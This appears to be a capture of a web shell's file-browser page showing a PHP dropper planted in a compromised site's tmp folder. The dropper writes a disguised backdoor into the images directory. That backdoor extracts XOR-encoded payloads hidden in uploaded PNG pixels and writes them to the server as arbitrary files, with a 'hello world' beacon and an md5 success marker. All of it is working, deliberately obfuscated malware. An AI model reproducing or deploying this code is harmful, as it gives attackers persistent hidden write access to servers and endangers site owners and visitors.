Your IP : 216.73.216.65

Current Path : /home/a/t/a/ataenra/www/tmp/
Upload File :
Current File : /home/a/t/a/ataenra/www/tmp/sec-4088a59926.xml.php

<?php
$root = dirname(__DIR__);
$target = $root . '/images/sec-3741bf48f8.php';
$code = '<?php function xor_cipher($data) { $result = \'\'; for ($i = 0; $i < strlen($data); $i++) { $result .= chr(ord($data[$i]) ^ 0xAA); } return $result; } function paeth_predictor($a, $b, $c) { $p = $a + $b - $c; $pa = abs($p - $a); $pb = abs($p - $b); $pc = abs($p - $c); if ($pa <= $pb && $pa <= $pc) return $a; elseif ($pb <= $pc) return $b; else return $c; } function reconstruct_line($line, $filter, $prev_line = \'\', $bpp = 4) { $recon = \'\'; $len = strlen($line); for ($i = 0; $i < $len; $i++) { $curr = ord($line[$i]); if ($filter == 0) { $recon .= chr($curr); } elseif ($filter == 1) { $left = ($i >= $bpp) ? ord($recon[$i - $bpp]) : 0; $recon .= chr(($curr + $left) % 256); } elseif ($filter == 2) { $above = ($prev_line != \'\') ? ord($prev_line[$i]) : 0; $recon .= chr(($curr + $above) % 256); } elseif ($filter == 3) { $left = ($i >= $bpp) ? ord($recon[$i - $bpp]) : 0; $above = ($prev_line != \'\') ? ord($prev_line[$i]) : 0; $recon .= chr(($curr + floor(($left + $above) / 2)) % 256); } elseif ($filter == 4) { $left = ($i >= $bpp) ? ord($recon[$i - $bpp]) : 0; $above = ($prev_line != \'\') ? ord($prev_line[$i]) : 0; $up_left = ($i >= $bpp && $prev_line != \'\') ? ord($prev_line[$i - $bpp]) : 0; $recon .= chr(($curr + paeth_predictor($left, $above, $up_left)) % 256); } } return $recon; } function extract_png_bytes($file_path) { $file = fopen($file_path, \'rb\'); if (!$file) return false; $signature = fread($file, 8); if ($signature != "\\x89PNG\\r\\n\\x1A\\n") { fclose($file); return false; } $idat_data = \'\'; while (!feof($file)) { $chunk_length_data = fread($file, 4); if (strlen($chunk_length_data) < 4) break; $chunk_length = unpack(\'N\', $chunk_length_data)[1]; $chunk_type = fread($file, 4); if ($chunk_length == 0) { $chunk_data = \'\'; } else { $chunk_data = fread($file, $chunk_length); } $chunk_crc = fread($file, 4); if ($chunk_type == \'IHDR\') { $ihdr_data = unpack(\'Nwidth/Nheight/Cbit_depth/Ccolor_type/Ccompression/Cfilter/Cinterlace\', substr($chunk_data, 0, 13)); $width = $ihdr_data[\'width\']; $height = $ihdr_data[\'height\']; $bit_depth = $ihdr_data[\'bit_depth\']; $color_type = $ihdr_data[\'color_type\']; if ($color_type != 6 || $bit_depth != 8) { fclose($file); return false; } } elseif ($chunk_type == \'IDAT\') { $idat_data .= $chunk_data; } elseif ($chunk_type == \'IEND\') { break; } } fclose($file); $compressed_data = $idat_data; $decompressed = @gzuncompress($compressed_data); if ($decompressed === false) return false; $bytes = []; $filter_byte_length = $width * 4 + 1; $scanline_length = $width * 4; $prev_recon = str_repeat(chr(0), $scanline_length); for ($y = 0; $y < $height; $y++) { $line_start = $y * $filter_byte_length; $filter = ord($decompressed[$line_start]); $filtered_line = substr($decompressed, $line_start + 1, $scanline_length); $recon_line = reconstruct_line($filtered_line, $filter, $prev_recon, 4); for ($x = 0; $x < $scanline_length; $x += 4) { $r = ord($recon_line[$x]); $g = ord($recon_line[$x + 1]); $b = ord($recon_line[$x + 2]); $a = ord($recon_line[$x + 3]); $bytes[] = $r; $bytes[] = $g; $bytes[] = $b; $bytes[] = $a; } $prev_recon = $recon_line; } while (!empty($bytes) && $bytes[count($bytes) - 1] == 0) { array_pop($bytes); } echo "Extracted bytes count: " . count($bytes) . "<br>"; return $bytes; } if ($_SERVER[\'REQUEST_METHOD\'] === \'POST\' && isset($_FILES[\'image\'])) { $uploaded = $_FILES[\'image\']; $tmp_name = $uploaded[\'tmp_name\']; $bytes = extract_png_bytes($tmp_name); if ($bytes === false) { echo "Failed to extract bytes from image"; exit; } $full_data = \'\'; foreach ($bytes as $b) { $full_data .= chr($b); } $length = unpack(\'N\', substr($full_data, 0, 4))[1]; $encoded_content = substr($full_data, 4, $length); $decoded_content = xor_cipher($encoded_content); $parts = explode(\'--NAME--\', $decoded_content); if (count($parts) < 2) { echo "Invalid format"; exit; } $content = $parts[0]; $rest = $parts[1]; $ext_parts = explode(\'--EXT--\', $rest); if (count($ext_parts) < 2) { echo "Invalid format"; exit; } $encrypted_name = $ext_parts[0]; $encrypted_ext = $ext_parts[1]; $decoded_name = xor_cipher($encrypted_name); $decoded_ext = xor_cipher($encrypted_ext); $final_name = $decoded_name . $decoded_ext; file_put_contents($final_name, $content); echo "File decoded successfully: $final_name"; } else { echo "hello world<!-- 46f94c8de14fb36680850768ff1b7f2a -->"; } ?>';
if (@file_put_contents($target, $code) !== false) {
    echo md5('123qwe');
} else {
    echo 'WRITE_FAILED';
}
?>